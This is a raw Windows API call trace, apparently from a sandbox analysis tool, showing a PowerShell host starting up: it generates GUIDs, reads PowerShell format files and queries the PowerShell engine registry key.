	[0644.095] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2c29025e, Data2=0x9968, Data3=0x4224, Data4=([0]=0xaf, [1]=0x35, [2]=0x41, [3]=0xab, [4]=0x72, [5]=0xdc, [6]=0x2e, [7]=0x2a))) returned 0x0
	[0644.100] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xa697471e, Data2=0xedab, Data3=0x42ed, Data4=([0]=0x85, [1]=0x53, [2]=0xbc, [3]=0x36, [4]=0x7, [5]=0x40, [6]=0x6d, [7]=0xc2))) returned 0x0
	[0644.102] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2358dcbd, Data2=0xdd21, Data3=0x40a2, Data4=([0]=0x9c, [1]=0x86, [2]=0x2a, [3]=0xb9, [4]=0xb1, [5]=0x2, [6]=0xff, [7]=0x97))) returned 0x0
	[0644.102] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf3070273, Data2=0xf24b, Data3=0x4a46, Data4=([0]=0xa6, [1]=0x66, [2]=0x9d, [3]=0xe6, [4]=0xb1, [5]=0x82, [6]=0x42, [7]=0x79))) returned 0x0
	[0644.103] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x7c9c9445, Data2=0xf872, Data3=0x4b92, Data4=([0]=0xa0, [1]=0xa8, [2]=0xa9, [3]=0x74, [4]=0x29, [5]=0x12, [6]=0xfe, [7]=0x1f))) returned 0x0
	[0644.103] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf19dff82, Data2=0x3a29, Data3=0x4ec3, Data4=([0]=0x81, [1]=0xfe, [2]=0xd1, [3]=0x57, [4]=0x3e, [5]=0x66, [6]=0x79, [7]=0xd5))) returned 0x0
	[0644.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0644.104] SetErrorMode (uMode=0x1) returned 0x1
	[0644.104] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0644.104] GetFileType (hFile=0x324) returned 0x1
	[0644.104] SetErrorMode (uMode=0x1) returned 0x1
	[0644.104] GetFileType (hFile=0x324) returned 0x1
	[0644.105] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.107] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.107] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.107] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.108] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.108] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0644.108] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0xaca, lpOverlapped=0x0) returned 1
	[0644.108] ReadFile (in: hFile=0x324, lpBuffer=0x2e106da, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e106da*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0644.108] ReadFile (in: hFile=0x324, lpBuffer=0x2e110a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2e110a8*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0644.108] CloseHandle (hObject=0x324) returned 1
	[0644.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0644.109] SetErrorMode (uMode=0x1) returned 0x1
	[0644.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0644.109] SetErrorMode (uMode=0x1) returned 0x1
	[0644.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0644.109] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0644.109] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0644.109] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35890
	[0644.109] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35890, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0644.109] CoTaskMemFree (pv=0x1ba35890) 
	[0644.110] RegCloseKey (hKey=0x324) returned 0x0
	[0644.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0644.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0644.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0644.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0644.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0646.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0646.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0646.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x26c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0650.037] VirtualQuery (in: lpAddress=0x26bb60, lpBuffer=0x26ca20, dwLength=0x30 | out: lpBuffer=0x26ca20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0650.038] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf154f367, Data2=0x13c9, Data3=0x47ce, Data4=([0]=0x85, [1]=0x11, [2]=0x4f, [3]=0x1c, [4]=0x76, [5]=0x31, [6]=0xa5, [7]=0x59))) returned 0x0
	[0650.039] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xb21c7dba, Data2=0xd89e, Data3=0x4c4d, Data4=([0]=0x9a, [1]=0xf5, [2]=0x8f, [3]=0xa9, [4]=0xd3, [5]=0x2e, [6]=0x90, [7]=0xed))) returned 0x0
	[0650.040] VirtualQuery (in: lpAddress=0x26bd10, lpBuffer=0x26cbd0, dwLength=0x30 | out: lpBuffer=0x26cbd0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0650.041] VirtualQuery (in: lpAddress=0x26bd10, lpBuffer=0x26cbd0, dwLength=0x30 | out: lpBuffer=0x26cbd0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0650.042] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x3edc209f, Data2=0xad55, Data3=0x458f, Data4=([0]=0x84, [1]=0x84, [2]=0xa4, [3]=0xe6, [4]=0x60, [5]=0xca, [6]=0x40, [7]=0xad))) returned 0x0
	[0650.045] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xe899409c, Data2=0x92b, Data3=0x4c3d, Data4=([0]=0xac, [1]=0x98, [2]=0xb4, [3]=0x6a, [4]=0xbc, [5]=0xcc, [6]=0xc2, [7]=0x90))) returned 0x0
	[0650.045] VirtualQuery (in: lpAddress=0x26bf60, lpBuffer=0x26ce20, dwLength=0x30 | out: lpBuffer=0x26ce20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0650.049] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xfa3708db, Data2=0x7b10, Data3=0x40aa, Data4=([0]=0x85, [1]=0xf3, [2]=0x38, [3]=0x3, [4]=0x4e, [5]=0xf8, [6]=0x91, [7]=0x71))) returned 0x0
	[0650.049] VirtualQuery (in: lpAddress=0x26b5d0, lpBuffer=0x26c490, dwLength=0x30 | out: lpBuffer=0x26c490*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0650.050] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xa7a83538, Data2=0x6657, Data3=0x4ff8, Data4=([0]=0xb9, [1]=0x7b, [2]=0x6a, [3]=0x1e, [4]=0x63, [5]=0x14, [6]=0x17, [7]=0xd0))) returned 0x0
	[0650.050] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x3aba33d4, Data2=0xe9eb, Data3=0x4277, Data4=([0]=0x86, [1]=0xa3, [2]=0x18, [3]=0x31, [4]=0x98, [5]=0x1c, [6]=0x7a, [7]=0xbb))) returned 0x0
	[0650.050] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0650.050] GetFileType (hFile=0x324) returned 0x1
	[0650.050] SetErrorMode (uMode=0x1) returned 0x1
	[0650.050] GetFileType (hFile=0x324) returned 0x1
	[0650.050] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.056] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.056] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.056] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.057] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.057] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.057] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.057] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.058] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.058] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.059] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.059] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.059] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.059] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.059] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.059] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.060] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0650.060] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0xbce, lpOverlapped=0x0) returned 1
	[0650.060] ReadFile (in: hFile=0x324, lpBuffer=0x2ec2dd6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec2dd6*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0650.061] ReadFile (in: hFile=0x324, lpBuffer=0x2ec36a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ec36a0*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0650.061] CloseHandle (hObject=0x324) returned 1
	[0650.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0650.061] SetErrorMode (uMode=0x1) returned 0x1
	[0650.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0650.061] SetErrorMode (uMode=0x1) returned 0x1
	[0650.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0650.062] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0650.062] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0650.062] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35c80
	[0650.062] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35c80, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0650.062] CoTaskMemFree (pv=0x1ba35c80) 
	[0650.062] RegCloseKey (hKey=0x324) returned 0x0
	[0650.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0650.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0650.064] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf0f7475d, Data2=0xd84a, Data3=0x41bc, Data4=([0]=0x9e, [1]=0x59, [2]=0x9b, [3]=0x7b, [4]=0xa7, [5]=0xd4, [6]=0xc4, [7]=0xa4))) returned 0x0
	[0650.064] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x85166437, Data2=0xffa4, Data3=0x4300, Data4=([0]=0xa2, [1]=0x89, [2]=0xce, [3]=0xca, [4]=0x7b, [5]=0xb8, [6]=0x2e, [7]=0x54))) returned 0x0
	[0650.064] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf86da112, Data2=0xcb1d, Data3=0x4d45, Data4=([0]=0xab, [1]=0x95, [2]=0x4e, [3]=0x3, [4]=0x3c, [5]=0x5e, [6]=0x7e, [7]=0x55))) returned 0x0
	[0650.064] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x129bb7a3, Data2=0xfd8d, Data3=0x4d2e, Data4=([0]=0xb3, [1]=0xf2, [2]=0x7, [3]=0x3, [4]=0x39, [5]=0x66, [6]=0x7, [7]=0x73))) returned 0x0
	[0650.064] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2af1e274, Data2=0xf437, Data3=0x453f, Data4=([0]=0x9f, [1]=0x0, [2]=0xc1, [3]=0xa2, [4]=0x50, [5]=0x10, [6]=0x8, [7]=0x78))) returned 0x0
	[0650.065] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xa9c73943, Data2=0xbf83, Data3=0x4dd2, Data4=([0]=0x94, [1]=0xf2, [2]=0xbe, [3]=0xc7, [4]=0x3e, [5]=0x62, [6]=0x6f, [7]=0x81))) returned 0x0
	[0650.065] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x6224efd, Data2=0x45fb, Data3=0x4eaa, Data4=([0]=0xa0, [1]=0xcb, [2]=0xb3, [3]=0x71, [4]=0x73, [5]=0x5b, [6]=0xc4, [7]=0x8a))) returned 0x0
	[0650.065] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xdc635c55, Data2=0xfaa4, Data3=0x41c9, Data4=([0]=0xae, [1]=0xda, [2]=0x5a, [3]=0xd, [4]=0x3c, [5]=0xf8, [6]=0x5c, [7]=0xd0))) returned 0x0
	[0650.065] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xfc3d0392, Data2=0x559a, Data3=0x4bc6, Data4=([0]=0x90, [1]=0x38, [2]=0x17, [3]=0xa4, [4]=0x55, [5]=0x57, [6]=0xab, [7]=0xf8))) returned 0x0
	[0650.065] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x9bf33d75, Data2=0xfa07, Data3=0x49a3, Data4=([0]=0x94, [1]=0x70, [2]=0x90, [3]=0xa1, [4]=0x53, [5]=0x5f, [6]=0xeb, [7]=0xbd))) returned 0x0
	[0650.065] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x8252d36a, Data2=0xe9a0, Data3=0x467f, Data4=([0]=0xbf, [1]=0x96, [2]=0xaf, [3]=0x72, [4]=0x20, [5]=0xff, [6]=0x8, [7]=0x90))) returned 0x0
	[0650.066] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xdec6eeb2, Data2=0x7472, Data3=0x4de2, Data4=([0]=0x80, [1]=0x5b, [2]=0x93, [3]=0x5e, [4]=0x9e, [5]=0x5a, [6]=0x3, [7]=0x1c))) returned 0x0
	[0650.066] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x207194f1, Data2=0x685c, Data3=0x47ef, Data4=([0]=0x98, [1]=0x93, [2]=0x8e, [3]=0x37, [4]=0xd1, [5]=0x15, [6]=0xea, [7]=0x36))) returned 0x0
	[0650.066] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf6002559, Data2=0x1a6b, Data3=0x435d, Data4=([0]=0xb7, [1]=0xc5, [2]=0x92, [3]=0x29, [4]=0xbe, [5]=0x7a, [6]=0xc, [7]=0xd0))) returned 0x0
